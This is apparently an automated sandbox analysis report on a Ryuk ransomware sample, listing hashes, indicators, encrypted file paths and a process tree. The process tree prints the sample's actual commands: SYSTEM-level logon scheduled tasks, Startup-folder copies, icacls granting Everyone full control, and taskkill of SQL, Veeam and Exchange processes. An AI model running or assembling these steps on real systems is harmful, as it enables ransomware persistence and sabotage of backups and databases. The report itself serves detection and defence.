Analysis
-
max time kernel
150s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
19-07-2023 14:04
Static task
static1
Behavioral task
behavioral1
Sample
ecd9d8ef99eb98exe_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
ecd9d8ef99eb98exe_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
ecd9d8ef99eb98exe_JC.exe
-
Size
889KB
-
MD5
ecd9d8ef99eb9813fa4eced549ea4d88
-
SHA1
7db7bff4ca9e94bbfe026c2282f3ce36e423f183
-
SHA256
fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
-
SHA512
2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
-
SSDEEP
12288:GFGYwyCMcRzRjWYgeWYg955/155/KQurE+HG8dSyjCtRronBeSrBa:GFGYtSNBQKEmG8HjCXrUVa
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Renames multiple (5399) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 2828 icacls.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\O: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\U: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\V: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\W: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\Y: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\Z: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\F: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\H: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\I: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\M: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\N: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\R: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\G: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\J: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\P: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\T: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\E: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\K: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\L: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\A: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\Q: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\S: ecd9d8ef99eb98exe_JC.exe File opened (read-only) \??\X: ecd9d8ef99eb98exe_JC.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\St_Johns.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18211_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\FM20.CHM.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285926.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\UseSelect.mhtml.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\EVRGREEN.INF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\STUDIO.ELM.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jre7\bin\server\Xusage.txt.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02201_.GIF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEERR.DLL.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEXBE.DLL.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF.[[email protected]].[8F562417].RYK ecd9d8ef99eb98exe_JC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2136 schtasks.exe 2576 schtasks.exe 2516 schtasks.exe 2012 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 2900 taskkill.exe 2908 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe 2660 ecd9d8ef99eb98exe_JC.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2900 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2660 wrote to memory of 2132 2660 ecd9d8ef99eb98exe_JC.exe 29 PID 2660 wrote to memory of 2132 2660 ecd9d8ef99eb98exe_JC.exe 29 PID 2660 wrote to memory of 2132 2660 ecd9d8ef99eb98exe_JC.exe 29 PID 2132 wrote to memory of 2136 2132 cmd.exe 30 PID 2132 wrote to memory of 2136 2132 cmd.exe 30 PID 2132 wrote to memory of 2136 2132 cmd.exe 30 PID 2660 wrote to memory of 1656 2660 ecd9d8ef99eb98exe_JC.exe 31 PID 2660 wrote to memory of 1656 2660 ecd9d8ef99eb98exe_JC.exe 31 PID 2660 wrote to memory of 1656 2660 ecd9d8ef99eb98exe_JC.exe 31 PID 2660 wrote to memory of 1876 2660 ecd9d8ef99eb98exe_JC.exe 32 PID 2660 wrote to memory of 1876 2660 ecd9d8ef99eb98exe_JC.exe 32 PID 2660 wrote to memory of 1876 2660 ecd9d8ef99eb98exe_JC.exe 32 PID 2660 wrote to memory of 2536 2660 ecd9d8ef99eb98exe_JC.exe 33 PID 2660 wrote to memory of 2536 2660 ecd9d8ef99eb98exe_JC.exe 33 PID 2660 wrote to memory of 2536 2660 ecd9d8ef99eb98exe_JC.exe 33 PID 2536 wrote to memory of 2576 2536 cmd.exe 34 PID 2536 wrote to memory of 2576 2536 cmd.exe 34 PID 2536 wrote to memory of 2576 2536 cmd.exe 34 PID 2660 wrote to memory of 2804 2660 ecd9d8ef99eb98exe_JC.exe 35 PID 2660 wrote to memory of 2804 2660 ecd9d8ef99eb98exe_JC.exe 35 PID 2660 wrote to memory of 2804 2660 ecd9d8ef99eb98exe_JC.exe 35 PID 2804 wrote to memory of 1672 2804 cmd.exe 36 PID 2804 wrote to memory of 1672 2804 cmd.exe 36 PID 2804 wrote to memory of 1672 2804 cmd.exe 36 PID 2660 wrote to memory of 2528 2660 ecd9d8ef99eb98exe_JC.exe 37 PID 2660 wrote to memory of 2528 2660 ecd9d8ef99eb98exe_JC.exe 37 PID 2660 wrote to memory of 2528 2660 ecd9d8ef99eb98exe_JC.exe 37 PID 2528 wrote to memory of 2516 2528 cmd.exe 38 PID 2528 wrote to memory of 2516 2528 cmd.exe 38 PID 2528 wrote to memory of 2516 2528 cmd.exe 38 PID 2660 wrote to memory of 2492 2660 ecd9d8ef99eb98exe_JC.exe 39 PID 2660 wrote to memory of 2492 2660 ecd9d8ef99eb98exe_JC.exe 39 PID 2660 wrote to memory of 2492 2660 ecd9d8ef99eb98exe_JC.exe 39 PID 2492 wrote to memory of 2012 2492 cmd.exe 40 PID 2492 wrote to memory of 2012 2492 cmd.exe 40 PID 2492 wrote to memory of 2012 2492 cmd.exe 40 PID 2660 wrote to memory of 2428 2660 ecd9d8ef99eb98exe_JC.exe 41 PID 2660 wrote to memory of 2428 2660 ecd9d8ef99eb98exe_JC.exe 41 PID 2660 wrote to memory of 2428 2660 ecd9d8ef99eb98exe_JC.exe 41 PID 2428 wrote to memory of 1716 2428 cmd.exe 42 PID 2428 wrote to memory of 1716 2428 cmd.exe 42 PID 2428 wrote to memory of 1716 2428 cmd.exe 42 PID 2660 wrote to memory of 2416 2660 ecd9d8ef99eb98exe_JC.exe 43 PID 2660 wrote to memory of 2416 2660 ecd9d8ef99eb98exe_JC.exe 43 PID 2660 wrote to memory of 2416 2660 ecd9d8ef99eb98exe_JC.exe 43 PID 2416 wrote to memory of 1540 2416 cmd.exe 44 PID 2416 wrote to memory of 1540 2416 cmd.exe 44 PID 2416 wrote to memory of 1540 2416 cmd.exe 44 PID 2660 wrote to memory of 1080 2660 ecd9d8ef99eb98exe_JC.exe 45 PID 2660 wrote to memory of 1080 2660 ecd9d8ef99eb98exe_JC.exe 45 PID 2660 wrote to memory of 1080 2660 ecd9d8ef99eb98exe_JC.exe 45 PID 1080 wrote to memory of 2644 1080 cmd.exe 46 PID 1080 wrote to memory of 2644 1080 cmd.exe 46 PID 1080 wrote to memory of 2644 1080 cmd.exe 46 PID 2660 wrote to memory of 1992 2660 ecd9d8ef99eb98exe_JC.exe 48 PID 2660 wrote to memory of 1992 2660 ecd9d8ef99eb98exe_JC.exe 48 PID 2660 wrote to memory of 1992 2660 ecd9d8ef99eb98exe_JC.exe 48 PID 1992 wrote to memory of 2508 1992 cmd.exe 49 PID 1992 wrote to memory of 2508 1992 cmd.exe 49 PID 1992 wrote to memory of 2508 1992 cmd.exe 49 PID 1992 wrote to memory of 2900 1992 cmd.exe 50 PID 1992 wrote to memory of 2900 1992 cmd.exe 50 PID 1992 wrote to memory of 2900 1992 cmd.exe 50 PID 2644 wrote to memory of 2828 2644 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
pid Process 1672 attrib.exe 1716 attrib.exe 1540 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:2136
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
PID:1656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵PID:1876
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
PID:2576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
PID:1672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
PID:2516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F2⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F3⤵
- Creates scheduled task(s)
PID:2012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
PID:1716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
PID:1540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
PID:2828
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵PID:2508
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵PID:844
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵PID:3052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵PID:2156
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵PID:2856
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵PID:2712
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵PID:2772
